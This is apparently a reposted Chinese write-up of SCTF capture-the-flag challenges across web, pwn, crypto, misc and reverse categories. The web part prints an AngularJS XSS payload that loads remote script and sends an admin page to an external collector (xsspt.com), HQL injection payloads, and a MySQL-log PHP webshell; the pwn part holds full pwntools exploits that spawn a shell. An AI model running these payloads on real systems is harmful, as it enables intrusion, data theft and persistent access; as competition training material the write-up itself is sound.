内容简介:看了一下页面内引用了AngularJS 1.4.6,然后找了一下对应版本的XSS漏洞,参考文章提交留言即可触发xss,管理员那边也会触发一遍。
WEB
新的建议板
看了一下页面内引用了AngularJS 1.4.6,然后找了一下对应版本的XSS漏洞,参考文章 XSS without HTML: Client-Side Template Injection with AngularJS
1.4.0 - 1.4.9
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
提交留言即可触发xss,管理员那边也会触发一遍。
这里留言似乎有点过滤,我用base64编码然后利用JQuery的$.getScript函数引用js文件
$.getScript('http://xsspt.com/xxxx');
编码之后
eval(atob('JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw=='));
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw==\'));}}
提交留言然后就打到管理员了
然后发现后台并不在公网上, http://127.0.0.1:1002/admin/
构造payload开始读管理员后台
$.ajax({
url: "/admin",
type: "GET",
dataType: "text",
success: function(result) {
var code = btoa(encodeURIComponent(result));
xssPost('https://xsspt.com/index.php?do=api&id=xxxxxx', code);
},
error: function(msg) {
}
})
function xssPost(url, postStr) {
var de;
de = document.body.appendChild(document.createElement('iframe'));
de.src = 'about:blank';
de.height = 1;
de.width = 1;
de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
de.contentDocument.forms[0].submit();
de.style.display = 'none';
}
在js脚本里写入读取后台页面的代码,提交留言,收到 /admin 页面的内容
在base64跟url解码之后,拿到 /admin 页面
我们可以看到有个文件管理页面,继续修改js访问 /admin/file
这里需要输入文件密码才能访问,我们接下来找一下文件密码
在一开始的首页里有个 min-test.js ,这里泄露了admin模板文件 view/admintest2313.html ,在这个模板中发现一个备忘录的接口
猜测这是在看 admintest2313 用户的备忘录,然后我们从获取到的后台页面中发现了 adminClound 这个用户名
拿到文件密码后,构造post包访问 /admin/file
$.ajax({
url: "/admin/file",
type: "POST",
data: "filepasswd=HGf%5E%2639NsslUIf%5E23",
dataType: "text",
success: function(result) {
var code = btoa(encodeURIComponent(result));
xssPost('https://xsspt.com/index.php?do=api&id=xxxxxx', code);
},
error: function(msg) {
}
})
然后直接就打到flag了
Zhuanxv
拿到题目先扫目录(emmm...),扫到 /list ,访问需要登录,然后抓到个请求 /loadimage?fileName=web_login_bg.jpg ,猜测这是个文件读取漏洞,然后再猜猜他是个 java 程序,构造路径读取 web.xml
发现是Struts2写的站点,读一下配置文件 ../../WEB-INF/classes/struts.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC
"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
"http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
<constant name="strutsenableDynamicMethodInvocation" value="false"/>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
<constant name="struts.action.extension" value=","/>
<package name="front" namespace="/" extends="struts-default">
<global-exception-mappings>
<exception-mapping exception="java.lang.Exception" result="error"/>
</global-exception-mappings>
<action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
<result name="error">/ctfpage/login.jsp</result>
<result name="success">/ctfpage/welcome.jsp</result>
</action>
<action name="loadimage" class="com.cuitctf.action.DownloadAction">
<result name="success" type="stream">
<param name="contentType">image/jpeg</param>
<param name="contentDisposition">attachment;filename="bg.jpg"</param>
<param name="inputName">downloadFile</param>
</result>
<result name="suffix_error">/ctfpage/welcome.jsp</result>
</action>
</package>
<package name="back" namespace="/" extends="struts-default">
<interceptors>
<interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
<interceptor-stack name="userAuth">
<interceptor-ref name="defaultStack" />
<interceptor-ref name="oa" />
</interceptor-stack>
</interceptors>
<action name="list" class="com.cuitctf.action.AdminAction" method="execute">
<interceptor-ref name="userAuth">
<param name="excludeMethods">
execute
</param>
</interceptor-ref>
<result name="login_error">/ctfpage/login.jsp</result>
<result name="list_error">/ctfpage/welcome.jsp</result>
<result name="success">/ctfpage/welcome.jsp</result>
</action>
</package>
</struts>
根据上面的Action路径,构造读取class文件的路径 ../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class ,逐一把上面的class文件都下载一遍,然后再读一下 ../../WEB-INF/classes/applicationContext.xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource">
<property name="driverClassName">
<value>com.mysql.jdbc.Driver</value>
</property>
<property name="url">
<value>jdbc:mysql://localhost:3306/sctf</value>
</property>
<property name="username" value="root"/>
<property name="password" value="root" />
</bean>
<bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
<property name="mappingLocations">
<value>user.hbm.xml</value>
</property>
<property name="hibernateProperties">
<props>
<prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop>
<prop key="hibernate.show_sql">true</prop>
</props>
</property>
</bean>
<bean id="hibernateTemplate" class="org.springframework.orm.hibernate3.HibernateTemplate">
<property name="sessionFactory">
<ref bean="sessionFactory"/>
</property>
</bean>
<bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager">
<property name="sessionFactory">
<ref bean="sessionFactory"/>
</property>
</bean>
<bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true">
<property name="transactionManager">
<ref bean="transactionManager"/>
</property>
<property name="transactionAttributes">
<props>
<prop key="add">PROPAGATION_REQUIRED</prop>
<prop key="find*">PROPAGATION_REQUIRED,readOnly</prop>
</props>
</property>
</bean>
<bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl">
<property name="hibernateTemplate">
<ref bean="hibernateTemplate"/>
</property>
</bean>
<bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl">
<property name="userDao">
<ref bean="userDAO"/>
</property>
</bean>
</beans>
这里是用hibernate框架执行sql,读取一下 ../../WEB-INF/classes/user.hbm.xml
<?xml version="1.0"?>
<!DOCTYPE hibernate-mapping PUBLIC
"-//Hibernate/Hibernate Mapping DTD 3.0//EN"
"http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd">
<hibernate-mapping package="com.cuitctf.po">
<class name="User" table="hlj_members">
<id name="id" column="user_id">
<generator class="identity"/>
</id>
<property name="name"/>
<property name="password"/>
</class>
<class name="Flag" table="bc3fa8be0db46a3610db3ca0ec794c0b">
<id name="flag" column="welcometoourctf">
<generator class="identity"/>
</id>
<property name="flag"/>
</class>
</hibernate-mapping>
看样子flag在数据库里。接下来继续下载 applicationContext.xml 文件中引用的dao层跟service层的class文件
这里整理出主要的代码片段
//UserLoginAction.class
public boolean userCheck(User user) {
List < User > userList = this.userService.loginCheck(user.getName(), user.getPassword());
if ((userList != null) && (userList.size() == 1)) {
return true;
}
addActionError("Username or password is Wrong, please check!");
return false;
}
//UserServiceImpl.class
public List <User> loginCheck(String name, String password) {
name = name.replaceAll(" ", "");
name = name.replaceAll("=", "");
Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
if (password_matcher.find()) {
return this.userDao.loginCheck(name, password);
}
return null;
}
//UserDaoImpl.class
public List < User > loginCheck(String name, String password) {
return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
}
在 UserServiceImpl.class 这里只检测了password的正则,name只替换了空格跟等号,正则没起作用,所以这里可以注入
在登录处 user.name 注入
user.name=1'or''like''or''like'&user.password=aaaa
这样子直接进入后台,但这不是我们的目标,我们要读取数据库里的flag。可以利用登录判断来进行盲注,获取数据
user.name=1'or(name)like'ho%25'or''like'&user.password=aaaa
然后就跑出用户名为homamamama,这不是重点,我们要读flag。由于这个是hql,很多 mysql 的特性没法用,只能根据hql的语法构建一个子查询。试了一下 (select name from User)like'%' 可以猜测读取到用户名,但是根据xml的数据表结构读取Flag表 (select flag from Flag)like'%' 却不行。
继续构造注入猜测, (select count(*) from Flag)like'1' 这个可以,说明Flag表里有一条数据。很多人都困在这一步了,读不到Flag表。这里要利用的是hql语句的子查询, (from Flag)like'%' 这样子就可以了,然后构造脚本开始跑Flag就可以了
user.name=1'or(from Flag)like'sctf{%25'or''like'&user.password=aaaa
最后获取到的flag要将花括号里的转成大写
easiest web - phpmyadmin
一开始题目很卡根本上不去,并且一直有人搅屎。
到了中午主办方终于开了备份服务器并且提升配置表示很开始。
直接使用弱口令 root/root 登录上去
尝试使用 outfile 写入一句话发现不行
于是便想到使用日志的方法来包含我们的一句话
首先开启日志: set global general_log='on';
修改日志路径: set global general_log_file='D:/phpstudy/www/fuhei.php';
这时我们再查询我们的一句话,让他被记录进日志: select '<?php assert($_POST["fuhei"]);?>';
使用菜刀连接上去后在c盘根目录找到 flag.txt
PWN
bufoverflow_a
- fill时存在offbynull,通过Poison null byte造成overlap
unsigned __int64 __fastcall wraaper_read_E81(__int64 a1, unsigned __int64 a2)
{
char buf; // [rsp+13h] [rbp-Dh]
int i; // [rsp+14h] [rbp-Ch]
unsigned __int64 v5; // [rsp+18h] [rbp-8h]
v5 = __readfsqword(0x28u);
for ( i = 0; i < a2; ++i )
{
if ( read(0, &buf, 1uLL) <= 0 )
{
perror("Read faild!\n");
exit(-1);
}
if ( buf == 10 )
break;
*(a1 + i) = buf;
}
*(i + a1) = 0; // off by null
return __readfsqword(0x28u) ^ v5;
-
unsortbin attack 修改_IO_buf_base scanf 溢出修改malloc-hook 为magic
-
exp
#!/usr/bin/env python # coding=utf-8 from pwn import * context.log_level = 'debug' elf = ELF('./bufoverflow_a') libc = ELF('./libc.so.6') p = process('./bufoverflow_a',env={"LD_PRELOAD":'./libc.so.6'}) p = remote('116.62.152.176', 20001) def alloc(size):#0x7f - 0x1000 p.sendlineafter(">>",'1') p.sendlineafter("Size:",str(size)) def fill(co): p.sendlineafter(">>",'3') p.recvuntil("Content:") p.send(co) def dele(idx): p.sendlineafter(">>",'2') p.sendlineafter("Index:",str(idx)) def leak(): p.sendlineafter(">> ",'4') data = p.recvuntil('\x0a')[:-1] return data def pwn(): alloc(0x100)#0 alloc(0x100)#1 dele(0) alloc(0x100)#0 data = leak() libc.address = u64(data.ljust(8,'\x00')) - 0x399b58 success('[*]libc is ' + hex(libc.address)) dele(0) dele(1) alloc(0x420) fill('A'*0x100+'B'*0x200+p64(0x200)+'\n') dele(0) alloc(0x310)#0 alloc(0x100)#1 dele(0) alloc(0x108)#0 fill('A'*0x108+'\n') alloc(0x108)#2 alloc(0x88)#3 dele(2) dele(1) dele(0) payload = 'A'*0x210 + 'B'*8 + p64(0x91) alloc(1024) fill(payload+'\n') dele(3) dele(0) alloc(1024) un = libc.address + 0x0399900 bk = libc.address + 0x399b58 fd = libc.address + 0x399c38 payload = 'A'*0x210 + 'B'*8 + p64(0xf1)+ p64(fd)*2+"C"*0xd8 payload += p64(0x61)+'A'*0x68 + p64(0xa1) fill(payload+'\n') alloc(0xe0) dele(1) alloc(1024) dele(0) alloc(0xe0) dele(0) alloc(1024) payload = 'A'*0x210 + 'B'*8 + p64(0xf1) + p64(bk) + p64(un-0x10) fill(payload+'\n') print pidof(p) raw_input() alloc(0xe0) lock = libc.address + 0x39b770 vtable= libc.address + 0x396440 magic = libc.address + 0xd6655 payload = '\x00'*5 + p64(lock)+ p64(0)*9 + p64(vtable).ljust(0x158,"\x00")+ p64(magic) p.sendlineafter('>>' ,payload) p.interactive() pwn()
sbbs
Bctf原题
存在任意地址写 v3 接收16个字符可以覆盖到 v4
但是8个字符覆盖刚好到 v4 ,于是后面的回车符被换成 \x00 被送到 v1 里,于是只能写 clientele 了。
Free 后没有清空堆
这里我们申请刚 free 的堆块,只向里面写少量数据,就能泄露 fd 了,于是就能得到地址了
FILE 结构会通过 _chain 连接形成一个链表,链表头部用全局变量 _IO_list_all 表示。就会调用 _IO_OVERFLOW ,就会调用 vtable ,也就是虚表。 那么只要满足 fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base 我们的虚表中的 _IO_OVERFLOW 就会调用,而且程序是通过 _IO_list_all 来查找file结构体
//prev_size,size fake_file =p64(0)*3 fake_file += p64(233) fake_file += p64(0)*21 fake_file += p64(0x6020b0-0x18)
当 v3 溢出到 v4 赋值到任意地址, v3 本身的8个 bit 也是我们可以写的,于是把 one_gadget 写在了 v3 中,如果找不到地址也可以布在堆里,都是可以的。 0x6020b0 是 v3 的地址,而 OVERFLOW 在 vtable 的位置位于偏移 0x18 处,于是得到 0x6020b0-0x18
EXP
#!/usr/bin/env python
# coding=utf-8
#author rainbow541 by W&P
from pwn import *
#context.log_level = 'debug'
#context.terminal = ['gnome-terminal','-x','bash','-c']
p = process('./baby_arena')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
one = 0x4526a
def create(size,note):
p.sendline('1')
p.recvuntil('Pls Input your note size\n')
p.sendline(str(size))
p.recvuntil('Input your note\n')
p.sendline(note)
def dele(num):
p.sendline('2')
p.recvuntil('Input id:\n')
#gdb.attach(p)
create(0xa8,'0'*0xa8)
create(0xa8,'1'*0xa8)
dele(0)
create(0xa8,'0')
p.recvuntil('your note is\n')
a = p.recvline()
arena = u64(a+(8-len(a))*'0')%0x1000000000000
libcc = arena - 0x3c4b30
libc.address = libcc
max_fast = arena + 7368
success("libc:"+hex(libcc))
success("global_max_fast:"+hex(max_fast))
#--------
create(0x400,'3'*0x400)
create(0x400,'4'*0x400)
create(0x400,'4'*0x400)
dele(2)
dele(3)
create(0x100,'A'*16+'\n')
p.recvuntil('your note is\n')
p.recvuntil('A'*16)
heap_base = p.recvuntil('\n')[:-1]
heap_base = u64(heap_base + (8-len(heap_base))*'\x00')-0x220
success('heap_base:'+hex(heap_base))
fake_file =p64(0)*3
fake_file += p64(233)
fake_file += p64(0)*21
fake_file += p64(0x6020b0-0x18)
#------
create(5120,fake_file)
payload = p64(libcc + one) +p64(max_fast-8)
login(payload)#one bit \x0a > \x00 。。。。。。
dele(3)
p.sendline('4')
print pidof(p)
p.interactive()
成功getshell
Crypto
it may contain 'flag'
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf e=0xe42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac018cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939 c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3
Wiener's attack,拿着以前写的脚本直接跑,秒出flag:https://github.com/D001UM3/CTF-RSA-tool
➜ CTF-RSA-tool git:(master) ✗ cat problem.txt n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf e=0xe42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac018cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939 c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3% ➜ CTF-RSA-tool git:(master) ✗ python solve.py --verbose -i problem.txt DEBUG: factor N: try past ctf primes DEBUG: factor N: try Gimmicky Primes method DEBUG: factor N: try Wiener's attack DEBUG: d = 0xb28a1L INFO: flag1sH3r3_d_ist0sma1l ➜ CTF-RSA-tool git:(master) ✗
a number problem
x**33=1926041757553905692219721422025224638913707 mod 3436415358139016629092568198745009225773259
模数直接可以factordb分解,但是33和模数的欧拉函数不互素,所以我们先用 33/3 的模反数解密得到x^3的值,然后再爆破一下,得到x
import libnum
import gmpy2
e = 33
c = 1926041757553905692219721422025224638913707
n = 3436415358139016629092568198745009225773259
p = 3881
q = 885445853681787330351086884500131209939
phi_n = (p-1)*(q-1)
d = libnum.invmod(e/3, phi_n)
x_3 = pow(c, d, n)
print x_3
def calc(j):
# print j
a, b = gmpy2.iroot(x_3 + j * n, 3)
if b == 1:
print a
exit()
for i in xrange(0, 100000000):
calc(i)
ElGamal Hacker
求离散对数,谷歌discrete logarithm online 找到个在线计算的网站,直接得到私钥,然后解密
import libnum p = 2103157897831904071864395721267 g = 12 y = 446615800949186291810252513371 c1 = 1671718365703730324362467329360 c2 = 1381742645695058198993532913043 # https://www.alpertron.com.ar/DILOG.HTM k = 204595385545077747431008465026 assert y == pow(g, k, p) c1 = 1671718365703730324362467329360 c2 = 1381742645695058198993532913043 print libnum.n2s(libnum.invmod(pow(c1, k, p), p) * c2 % p)
MISC
神奇的Modbus
过滤协议modbus,右键跟踪tcp流,往后看,就能看到flag了
.s.c.t.f.{.E.a.s.y._.M.d.b.u.s.}
然后去掉点,提交不对,然后把Modbus补全,就是flag了
侧信道初探
根据资料 , SPA 是根据程序运行的能量进行检测,也就是每一句命令都有对应的波图。
经过分析可知:
这个代表了 R=2R
这个是 if 语句
即我们只要看 if 条件之后是否有多余语句执行(产生能量)即可判断二进制数据为0或为1
只有一簇的就是0
有两簇的就是1
由此可得flag数据为 0110111010
神秘的交易
查找了一波IC卡资料,
根据SLE4442手册 https://wenku.baidu.com/view/a6a6fb22482fb4daa58d4bf8.html
可知一共分别进行了三次校验,分别为 0x33 0x01 0xaa 0x33 0x02 0xbb 0x33 0x03 0xcc
并且每个字节从最低位开始传输,
即为
1100110010000000xxxxxxxx, 1100110001000000xxxxxxxx , 1100110011000000xxxxxxxx
然后就是把Logicdata丢进logic里分析啦
根据前面的字节查找到口令数据段:
最终得到3字节的口令 0x403110
肥宅快乐题
打游戏就给flag,不过真正的肥宅都懒得打,用Flash反编译找的flag。。。
多亏potplayer强大,能直接拖进度条跳帧。拖到后面找到了flag,但那字体1和l分不清,于是在反编译里查了附近的字段。直接定位,base64 decode,flag complete.
Reverse
simple
反编译发现动态解密了assets中的zip文件,由于解密的dex会落地因此可以直接运行后从文件目录中pull出来
再反编译这个 load.dex , onClick 函数中接收了24个字符并以每8个字符一组构造 Square ,最后调用其中的 check 函数要求全部为True
构造方法为 new Square((v1[i + x] << 8) + v12 + 255, i / 2 + 4); 这里的i取值范围为{0, 8, 16},x取值范围为[0, 7] 即
a1 = 0x315f00ff | input[i*8+x] a2 = i/2+4
还要注意要求每组中的后一个字符大于前一个字符
于是继续查看Square内部的方法
构造方法显示每个Square 内有5x5=25个
Point
a1 为 input , a2 为 turncout
Square(int arg2, int arg3) { super(); this.point = new Point[25]; this.input = arg2; this.turncout = arg3; this.initpoint(); if(this.check()) { this.turnpoint(); } }
initpoint() 方法来为25个
Point 赋值
简单来说就是从右往左逐位取值
对于 a1 而言,每个Squre如下所示
|0|1|2|3|4| |--|--|--|--|--| |1|1|1|1|1| |1|1|1|input7|input6| |input5|input4|input3|input2|input1| |input0|1|1|1|1| |1|0|1|0|1|
check方法则很简单 Point[i][i] 和 Point[4-i][i] 皆为1即可,即两条对角线上的Point要求为1
turnpoint 也并不复杂,循环将每个 Point 左移一位,最左边的 Point 顺位移到上一行的最后一位。循环执行的次数为 turncout ,即参数 a2
函数理清以后梳理一下逻辑
目标是最终 check 成功,那么必然构造Squre时的check也必须成功,即要求每个 Squre 构造好以后 check()==True -> turnopint() -> check()==True
解题思路为首先构造符合 check() 的 Squre ,然后按照 turnpoint 反向右移,再符合 check() 一次,此时的 Squre 为通解
再为了满足每组中input[i]<input[i+1]的条件,由通解逐步向上增加得到值
由于Point之间没有交互,我们只需要关注与input有关的8个Point即可
构造Squre脚本如下
c = [0 for i in range(25)]
l = [4, 8, 12]
a = []
def v(c):
for i in range(5):
c[i*5+i] = 1
c[i*5+4-i] = 1
for i in range(5):
print(c[i*5:i*5+5])
def getr(c):
return c[8:16][::-1]
v(c)
print()
for x in l:
a.append(c[-x:] + c[:-x])
for k in a:
v(k)
r = getr(k)
print("Input :")
print(r)
print()
得到符合要求的input通解,例如
[1, 0, 0, 1, 1] [0, 1, 0, 1, 0] [1, 0, 1, 0, 0] [0, 1, 0, 1, 0] [1, 0, 1, 0, 1] Input : [0, 0, 0, 1, 0, 1, 0, 1]
然后根据0b00010101逐步递增求解input值即可 脚本如下:
s = [0b00010101, 0b01010001, 0b00011001]
print("SCTF{", end='')
for x in s:
l = 48
for i in range(8):
while((l&x)<x):
l += 1
print(chr(l), end='')
l += 1
print("}")
PS:这flag是真的丑
Where is my 13th count?
运行发现只有12个球可得分,根据题目来看应该需要第13分
文件名提示CheatEngine,但运行会闪退
反编译 Cheat Engine_Data\Managed 目录下的 Assembly-CSharp.dll ,查看逻辑,发现有反调试
不过主逻辑都已经是囊中之物了,还CE个锤子呀,直接改 count 的初值为12,运行游戏吃一个球即可满足条件出现flag
PS:这flag更丑了
crackme2
java层调用了 native 函数,要求返回值为 15
在so中动态注册了 tryit 函数,但函数体为乱码,估计在 init 中动态解密
于是上动态调试,发现解密后的函数通过 fork 创建了子进程来执行计算,父进程则逐字符校验
直接抓出字符串后偏移位置即可得到flag
Script In Script
下载下来文件,观察js发现有动态解密
将 eval 改为 console.log 后即可在 console 中抓到解码后的函数 也可在 click 函数中的r处下断,单步跟进后逐个查看函数
function a(r) {
return D(~r, 1)
}
function D(r, n) {
return n ? D(r ^ n, (r & n) << 1) : r
}
function E(r, n) {
return D(r, a(n))
}
function F(r, n) {
var a = 0;
while (n) {
if (n & 1) {
a = D(a, r)
}
r = r << 1;
n = n >> 1
}
return a
}
function G(r, n) {
var a = 0;
while (r >= n) {
r = E(r, n);
a = D(a, 1)
}
return a
}
function H(r) {
return r.length
}
function J(r, n) {
return !(r ^ n)
}
function K(r, n) {
return r[n]
}
function L(r) {
if (r.length == 1) {
return r.charCodeAt(0)
}
}
function M(r) {
return +r
}
function N(r) {
return String(r)
}
function O(r, n) {
return r + n
}
function Q(r, n, a, v) {
for (var t = r; t <= n; t++) {
if (a[t] != v[t - r]) {
return false
}
}
return true
}
function r(r) {
var n = r;
var a = H(n);
var v = J(a, 24);
var t = K(n, 0);
var u = K(n, 1);
var i = K(n, 2);
var e = K(n, 3);
var f = D(L(t), L(i));
var o = E(L(t), L(u));
var c = K(n, 6);
var l = K(n, 7);
var h = K(n, 16);
var w = K(n, 17);
var I = J(E(L(u), L(h)), 0);
var S = J(D(L(c), L(l)), D(L(h), L(w)));
var _ = J(E(L(u), L(c)), 0);
var g = K(n, 21);
var p = K(n, 22);
var s = J(E(F(L(g), 2), G(66, L(p))), 64);
var P = Q(9, 15, n, "Pt_In_S");
var T = J(L(l), L("r"));
var b = J(f, 231);
var d = J(o, 16);
var j = M(K(n, 5));
var k = J(G(M(O(N(L(e)), "0")), j), 204);
var m = M(K(n, 8));
var q = Q(18, 20, n, "IpT");
var x = J(E(j, m), 4);
var y = J(F(m, m), m);
var z = J(D(L(K(n, 4)), D(m, m)), L(K(n, 23)));
var A = J(L(u), 99);
var B = J(L(K(n, 23)), 125);
var C = J(L(K(n, 22)), 33);
return v && I && S && _ && s && P && T && b && d && k && q && x && y && z && A && B && C
}
其中核心函数为D,动态调试输入几个值测试发现该函数为求和
后面其他几个函数就很简单了,E是减法、F是乘法、G是除法
机械梳理下来求解即可
from z3 import *
a = [Int("a%d"%i) for i in range(24)]
flag = [0 for i in range(24)]
s = Solver()
s.add(a[0] + a[2] == 231,
a[0] - a[1] == 16,
a[1] - a[16] == 0,
a[6] + a[7] == a[16] + a[17],
a[1] - a[6] == 0,
a[21]*2 - 66/a[22] == 64,
a[7] == ord('r'),
(a[3]*10)/(a[5]-ord('0')) == 204,
#int(a[5])
(a[5]-ord('0')) - (a[8]-ord('0')) == 4,
#int(a[8])
(a[8]-ord('0'))*(a[8]-ord('0'))==(a[8]-ord('0')),
a[4] + (a[8]-ord('0')+a[8]-ord('0')) == a[23],
a[1] == 99,
a[23] == 125,
a[22] == 33
)
c = s.check()
print(c)
if(c==sat):
m = s.model()
for i in range(24):
try:
v = m[a[i]].as_long()
flag[i] = v
except:
continue
for i in range(9, 16):
flag[i] = ord("Pt_In_S"[i-9])
for i in range(18, 21):
flag[i] = ord("IpT"[i-18])
print(flag)
for i in flag:
print(chr(i), end='')
####Babymips
JEB反编译,可以看出 main 中先将输入逐字符与 (i+1) 异或,然后对 0x400b3c 进行了一次解码 每个字节按位逆序,解码后执行该函数 idc还原脚本如下
#include <idc.idc>
static main()
{
auto StartVa, SavedStartVa, StopVa, Size, i, j;
auto v, n_v;
StartVa = 0x400b3c;
StopVa = 0x400d14;
Size = StopVa - StartVa;
SavedStartVa = StartVa;
for (i = 0; i < Size; i++)
{
v = Byte(StartVa);
n_v = 0;
for(j=0;j<8;j++)
{n_v = n_v | (((v>>j)&1)<<(7-j));}
PatchByte(StartVa, n_v);
Message("%x %x\n", v, n_v);
MakeCode(StartVa);
StartVa++;
}
AnalyzeArea(SavedStartVa, StopVa);
Message("Decode Opcode Ok ");
}
sub_400b3c 中对输入再次处理,先是对 (5, 37) 逐字符异或 0x30 ,然后对栈中-0x8处的变量以 (i-5)&3-12 为下标进行取值异或, -0x8-0xc=-0x14 ,即之前赋值为"sctf"的一个变量
最后 memcmp 与数组 0x412038 比较
反向处理可得flag
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
UNIX网络编程 卷1:套接字联网API(第3版)
W.Richard Stevens、Bill Fenner、Andrew M. Rudoff / 杨继张 / 人民邮电出版社 / 2010-6 / 129.00元
这是一部传世之作!顶级网络编程专家Bill Fenner和Andrew M. Rudoff应邀执笔,对W. Richard Stevens的经典作品进行修订。书中吸纳了近几年网络技术的发展,增添了IPv6、SCTP协议和密钥管理套接字等内容,深入讨论了最新的关键标准、实现和技术。 书中的所有示例都是在UNIX系统上测试通过的真实的、可运行的代码,继承了Stevens一直强调的理念:“学习网络......一起来看看 《UNIX网络编程 卷1:套接字联网API(第3版)》 这本书的介绍吧!
